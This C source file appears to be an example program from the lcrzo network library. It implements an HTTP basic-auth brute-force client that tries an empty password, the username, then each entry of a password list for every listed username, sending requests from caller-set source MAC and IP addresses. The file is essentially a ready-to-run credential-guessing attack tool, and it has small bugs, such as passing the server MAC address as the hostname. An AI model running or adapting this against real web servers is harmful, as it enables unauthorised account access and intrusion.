
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000203=
{ /*reference*/     "lcrzoex", 203,
  /*version*/       1, 1,
  /*title*/         "virtual tcp client [web get brute force]",
  /*french title*/  "client tcp virtuel [web get brute force]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device clieth serveth cliname servname cliport servport url usernamesfile passwdsfile",
  /*french usage*/  "device ethcli ethserv nomcli nomserv portcli portserv url fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "eth0 aa:bb:cc:dd:ee:ff 11:22:33:44:55:66 1.2.3.5 1.2.3.4 5555 80 /index.html /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "eth0 aa:bb:cc:dd:ee:ff 11:22:33:44:55:66 1.2.3.5 1.2.3.4 5555 80 /index.html /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000203_main(int argc, char *argv[]);
int lcrzoex_000203_http_get_brute(lcrzo_constdevice device,
				  lcrzo_constetha clientetha,
				  lcrzo_constetha serveretha,
				  lcrzo_ipl clientipl,
				  lcrzo_ipl serveripl,
				  lcrzo_uint16 clientport,
				  lcrzo_uint16 serverport,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000203_main(int argc, char *argv[])
{ lcrzo_etha clientetha, serveretha;
  lcrzo_ipl clientipl, serveripl;
  lcrzo_uint16 clientport, serverport;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  lcrzo_file fileuser, filepass;
  lcrzo_device device;
  lcrzo_hs hs;
  int ret;

  lcrzo_init();
  if ( argc<11 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000203, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* the default resolver timeout is too short if it's long to reach
     webserver's DNS */
  lcrzo_epr(shared_http_set_resolver_timeout());

  /* initialize the needed variables */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));
  lcrzo_epr(shared_para_etha_init_src(argv[2], clientetha));
  lcrzo_epr(shared_para_etha_init_dst(argv[3], serveretha));
  lcrzo_epr(shared_para_ipl_init_src(argv[4], &clientipl));
  lcrzo_epr(shared_para_hs_init_dst(argv[5], hs));
  lcrzo_epr(lcrzo_ipl_init_hs(hs, &serveripl));
  lcrzo_epr(shared_para_port_init_src(argv[6], &clientport));
  lcrzo_epr(shared_para_port_init_dst(argv[7], 80, &serverport));
  lcrzo_epr(lcrzo_file_open_read(argv[9], &fileuser));

  /* read each line of the files all try to access */  
  while ( LCRZO_TRUE )
  { ret=lcrzo_file_readm_line(&fileuser, LCRZO_WAIT_INFINITE, 
			      (lcrzo_data*)&user, &datasize);
    if (ret!=LCRZO_ERR_OK) break;
    user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000203_http_get_brute(device, clientetha, serveretha,
					    clientipl, serveripl,
					    clientport++, serverport,
					    argv[8], argv[3],
					    user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000203_http_get_brute(device, clientetha, serveretha,
					    clientipl, serveripl,
					    clientport++, serverport,
					    argv[8], argv[3],
					    user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_file_open_read(argv[10], &filepass));
    while ( LCRZO_TRUE )
    { ret=lcrzo_file_readm_line(&filepass, LCRZO_WAIT_INFINITE, 
				(lcrzo_data*)&pass, &datasize);
      if (ret!=LCRZO_ERR_OK) break;
      pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000203_http_get_brute(device, clientetha, serveretha,
					      clientipl, serveripl,
					      clientport++, serverport,
					      argv[8], argv[3],
					      user, pass));
      if (clientport>65535) clientport=2048;
      lcrzo_epr(lcrzo_string_free2(&pass));
    }
    lcrzo_epr(lcrzo_file_close(&filepass));
    lcrzo_epr(lcrzo_string_free2(&user));
  }

  /* close */
  lcrzo_epr(lcrzo_file_close(&fileuser));
  lcrzo_close();
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000203_http_get_brute(lcrzo_constdevice device,
				  lcrzo_constetha clientetha,
				  lcrzo_constetha serveretha,
				  lcrzo_ipl clientipl,
				  lcrzo_ipl serveripl,
				  lcrzo_uint16 clientport,
				  lcrzo_uint16 serverport,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass)
{ static lcrzo_uint32 numtest=0;
  lcrzo_sock sock;
  lcrzo_uint16 errornumber;
  lcrzo_string errormsg;
  int ret;
  
  /* open the connection */
  ret=LCRZO_ERR_OK+1;
  while (ret!=LCRZO_ERR_OK)
  { ret=lcrzo_sock_tcpcli_virt(device, clientetha, serveretha,
			       clientipl, serveripl, 
			       clientport,
			       serverport, &sock);
    if (ret!=LCRZO_ERR_OK) { lcrzo_er(lcrzo_err_print(ret)); }
  }

  /* send a request */
  lcrzo_epr(shared_http_request_get(&sock, url, hostname, serverport, 
				    NULL, NULL, user, pass));

  /* analyze the answer */
  lcrzo_epr(shared_http_response_readheader(&sock,
					    &errornumber,
					    &errormsg,
					    NULL, NULL, NULL, NULL,
					    NULL, NULL));
  if ( errornumber!=401 )
  { printf("%s\t%s\t-> %d (%s)\n", user, pass, errornumber, errormsg);
  }
  else
  { numtest++;
    if (!(numtest%10))
    { lcrzo_er(lcrzo_uint32_print("", numtest, "%u", " passwd tried\n"));
    }
  }
  lcrzo_epr(lcrzo_string_free2(&errormsg));

  /* close */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}



